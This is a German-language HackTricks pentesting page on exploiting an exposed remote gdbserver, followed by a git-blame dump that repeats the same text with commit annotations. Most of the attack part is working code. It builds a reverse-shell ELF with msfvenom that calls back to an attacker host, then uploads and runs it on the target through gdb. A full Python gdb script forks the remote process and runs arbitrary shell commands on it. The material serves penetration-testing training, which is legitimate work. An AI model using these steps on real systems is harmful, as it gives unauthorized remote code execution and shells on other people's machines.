hacktricks/network-services-pentesting/pentesting-remote-gdbserver.md

# Pentesting Remote GdbServer

<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere Möglichkeiten, HackTricks zu unterstützen:

* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.

</details>

<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>

**Sofort verfügbare Einrichtung für Schwachstellenbewertung und Penetrationstests**. Führen Sie einen vollständigen Pentest von überall aus mit 20+ Tools & Funktionen durch, die von der Aufklärung bis zum Bericht reichen. Wir ersetzen keine Pentester - wir entwickeln benutzerdefinierte Tools, Erkennungs- und Exploit-Module, um ihnen etwas Zeit zu geben, tiefer zu graben, Shells zu öffnen und Spaß zu haben.

{% embed url="https://pentest-tools.com/" %}

## **Grundlegende Informationen**

**gdbserver** ist ein Tool, das das Debuggen von Programmen remote ermöglicht. Es läuft neben dem zu debuggenden Programm auf demselben System, bekannt als "Ziel". Diese Einrichtung ermöglicht es dem **GNU Debugger**, sich von einer anderen Maschine, dem "Host", zu verbinden, auf der der Quellcode und eine binäre Kopie des debuggten Programms gespeichert sind. Die Verbindung zwischen **gdbserver** und dem Debugger kann über TCP oder eine serielle Leitung hergestellt werden, was vielseitige Debugging-Setups ermöglicht.

Sie können einen **gdbserver auf einem beliebigen Port lauschen lassen** und im Moment **ist nmap nicht in der Lage, den Dienst zu erkennen**.

## Ausnutzung

### Hochladen und Ausführen

Sie können ganz einfach ein **elf-Backdoor mit msfvenom erstellen**, hochladen und ausführen:
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote 10.10.10.11:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
```
### Führen Sie beliebige Befehle aus

Es gibt einen anderen Weg, **um den Debugger beliebige Befehle über ein** [**Python-Skript auszuführen, das hier entnommen wurde**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd`.
source ./remote-cmd.py

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
```
Zuerst **erstellen Sie lokal dieses Skript**:

{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3

import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
def __init__(self):
self.addresses = {}

self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")

gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")

gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")

super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

def preload(self):
for symbol in [
"close",
"execl",
"fork",
"free",
"lseek",
"malloc",
"open",
"read",
]:
self.load(symbol)

def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
)
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
else:
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')

return self.addresses[symbol]

def output(self):
# From `fcntl-linux.h`
O_RDONLY = 0
gdb.execute(
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
)

# From `stdio.h`
SEEK_SET = 0
SEEK_END = 2
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) <= 0:
gdb.write("No output was captured.")
return

gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')

gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')

def invoke(self, arg, from_tty):
try:
self.preload()

is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")

parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: x.pid == child_pid, gdb.inferiors())
)[0]
gdb.execute(f"inferior {child_inferior.num}")

try:
gdb.execute(
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
)
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
):
pass
else:
raise e
finally:
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")

self.output()
except Exception as e:
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
raise e
finally:
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


RemoteCmd()
```
{% endcode %}

<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>

**Sofort verfügbare Einrichtung für Schwachstellenbewertung und Penetrationstests**. Führen Sie einen vollständigen Pentest von überall aus mit mehr als 20 Tools & Funktionen durch, die von der Aufklärung bis zum Bericht reichen. Wir ersetzen keine Pentester - wir entwickeln benutzerdefinierte Tools, Erkennungs- und Exploit-Module, um ihnen etwas Zeit zu geben, tiefer zu graben, Shells zu öffnen und Spaß zu haben.

{% embed url="https://pentest-tools.com/" %}

<details>

<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere Möglichkeiten, HackTricks zu unterstützen:

* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.

</details>
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`# Pentesting Remote GdbServer`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`Andere Möglichkeiten, HackTricks zu unterstützen:`
arte 2024-01-03 10:42:55 +00:00
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`* Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die [ABONNEMENTPLÄNE](https://github.com/sponsors/carlospolop)!`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`* Holen Sie sich das [offizielle PEASS & HackTricks-Merch](https://peass.creator-spring.com)`
Translated to German 2024-02-10 15:36:32 +00:00			`* Entdecken Sie [The PEASS Family](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`* Treten Sie der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folgen Sie uns auf Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`* Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`</details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`Sofort verfügbare Einrichtung für Schwachstellenbewertung und Penetrationstests. Führen Sie einen vollständigen Pentest von überall aus mit 20+ Tools & Funktionen durch, die von der Aufklärung bis zum Bericht reichen. Wir ersetzen keine Pentester - wir entwickeln benutzerdefinierte Tools, Erkennungs- und Exploit-Module, um ihnen etwas Zeit zu geben, tiefer zu graben, Shells zu öffnen und Spaß zu haben.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
pentest-tools 2024-01-11 13:23:18 +00:00			`{% embed url="https://pentest-tools.com/" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`## Grundlegende Informationen`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			gdbserver ist ein Tool, das das Debuggen von Programmen remote ermöglicht. Es läuft neben dem zu debuggenden Programm auf demselben System, bekannt als "Ziel". Diese Einrichtung ermöglicht es dem GNU Debugger, sich von einer anderen Maschine, dem "Host", zu verbinden, auf der der Quellcode und eine binäre Kopie des debuggten Programms gespeichert sind. Die Verbindung zwischen gdbserver und dem Debugger kann über TCP oder eine serielle Leitung hergestellt werden, was vielseitige Debugging-Setups ermöglicht.
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`Sie können einen gdbserver auf einem beliebigen Port lauschen lassen und im Moment ist nmap nicht in der Lage, den Dienst zu erkennen.`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`## Ausnutzung`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`### Hochladen und Ausführen`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`Sie können ganz einfach ein elf-Backdoor mit msfvenom erstellen, hochladen und ausführen:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			`# Trick shared by @B1n4rySh4d0w`
			`msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf`

			`chmod +x binary.elf`

			`gdb binary.elf`

			`# Set remote debuger target`
			`target extended-remote 10.10.10.11:1337`

			`# Upload elf file`
			`remote put binary.elf binary.elf`

			`# Set remote executable file`
			`set remote exec-file /home/user/binary.elf`

			`# Execute reverse shell executable`
			`run`

			`# You should get your reverse-shell`
			```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`### Führen Sie beliebige Befehle aus`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`Es gibt einen anderen Weg, um den Debugger beliebige Befehle über ein [Python-Skript auszuführen, das hier entnommen wurde](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
			`target extended-remote 192.168.1.4:2345`

			# Load our custom gdb command `rcmd`.
			`source ./remote-cmd.py`

			`# Change to a trusty binary and run it to load it`
			`set remote exec-file /bin/bash`
			`r`

			`# Run until a point where libc has been loaded on the remote process, e.g. start of main().`
			`tb main`
			`r`

			# Run the remote command, e.g. `ls`.
			`rcmd ls`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`Zuerst erstellen Sie lokal dieses Skript:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
			`{% code title="remote-cmd.py" %}`
			```python
			`#!/usr/bin/env python3`

			`import gdb`
			`import re`
			`import traceback`
			`import uuid`


			`class RemoteCmd(gdb.Command):`
Translated to German 2024-02-10 15:36:32 +00:00			`def __init__(self):`
			`self.addresses = {}`

			`self.tmp_file = f'/tmp/{uuid.uuid4().hex}'`
			`gdb.write(f"Using tmp output file: {self.tmp_file}.\n")`

			`gdb.execute("set detach-on-fork off")`
			`gdb.execute("set follow-fork-mode parent")`

			`gdb.execute("set max-value-size unlimited")`
			`gdb.execute("set pagination off")`
			`gdb.execute("set print elements 0")`
			`gdb.execute("set print repeats 0")`

			`super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)`

			`def preload(self):`
			`for symbol in [`
			`"close",`
			`"execl",`
			`"fork",`
			`"free",`
			`"lseek",`
			`"malloc",`
			`"open",`
			`"read",`
			`]:`
			`self.load(symbol)`

			`def load(self, symbol):`
			`if symbol not in self.addresses:`
			`address_string = gdb.execute(f"info address {symbol}", to_string=True)`
			`match = re.match(`
			`f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE`
			`)`
			`if match and len(match.groups()) > 0:`
			`self.addresses[symbol] = match.groups()[0]`
			`else:`
			`raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')`

			`return self.addresses[symbol]`

			`def output(self):`
			# From `fcntl-linux.h`
			`O_RDONLY = 0`
			`gdb.execute(`
			`f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'`
			`)`

			# From `stdio.h`
			`SEEK_SET = 0`
			`SEEK_END = 2`
			`gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')`
			`gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')`
			`if int(gdb.convenience_variable("len")) <= 0:`
			`gdb.write("No output was captured.")`
			`return`

			`gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')`
			`gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')`
			`gdb.execute('printf "%s\\n", (char*) $mem')`

			`gdb.execute(f'call (int){self.load("close")}($fd)')`
			`gdb.execute(f'call (int){self.load("free")}($mem)')`

			`def invoke(self, arg, from_tty):`
			`try:`
			`self.preload()`

			`is_auto_solib_add = gdb.parameter("auto-solib-add")`
			`gdb.execute("set auto-solib-add off")`

			`parent_inferior = gdb.selected_inferior()`
			`gdb.execute(f'set $child_pid = (int){self.load("fork")}()')`
			`child_pid = gdb.convenience_variable("child_pid")`
			`child_inferior = list(`
			`filter(lambda x: x.pid == child_pid, gdb.inferiors())`
			`)[0]`
			`gdb.execute(f"inferior {child_inferior.num}")`

			`try:`
			`gdb.execute(`
			`f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'`
			`)`
			`except gdb.error as e:`
			`if (`
			`"The program being debugged exited while in a function called from GDB"`
			`in str(e)`
			`):`
			`pass`
			`else:`
			`raise e`
			`finally:`
			`gdb.execute(f"inferior {parent_inferior.num}")`
			`gdb.execute(f"remove-inferiors {child_inferior.num}")`

			`self.output()`
			`except Exception as e:`
			`gdb.write("".join(traceback.TracebackException.from_exception(e).format()))`
			`raise e`
			`finally:`
			`gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00

			`RemoteCmd()`
			```
			`{% endcode %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`Sofort verfügbare Einrichtung für Schwachstellenbewertung und Penetrationstests. Führen Sie einen vollständigen Pentest von überall aus mit mehr als 20 Tools & Funktionen durch, die von der Aufklärung bis zum Bericht reichen. Wir ersetzen keine Pentester - wir entwickeln benutzerdefinierte Tools, Erkennungs- und Exploit-Module, um ihnen etwas Zeit zu geben, tiefer zu graben, Shells zu öffnen und Spaß zu haben.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
pentest-tools 2024-01-11 13:23:18 +00:00			`{% embed url="https://pentest-tools.com/" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to German 2024-02-10 15:36:32 +00:00			`Andere Möglichkeiten, HackTricks zu unterstützen:`
arte 2024-01-03 10:42:55 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`* Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die [ABONNEMENTPLÄNE](https://github.com/sponsors/carlospolop)!`
Translated to German 2024-02-10 15:36:32 +00:00			`* Holen Sie sich das [offizielle PEASS & HackTricks-Merchandise](https://peass.creator-spring.com)`
			`* Entdecken Sie [The PEASS Family](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-17 16:32:19 +00:00			`* Treten Sie der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folgen Sie uns auf Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:31:25 +00:00			`* Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`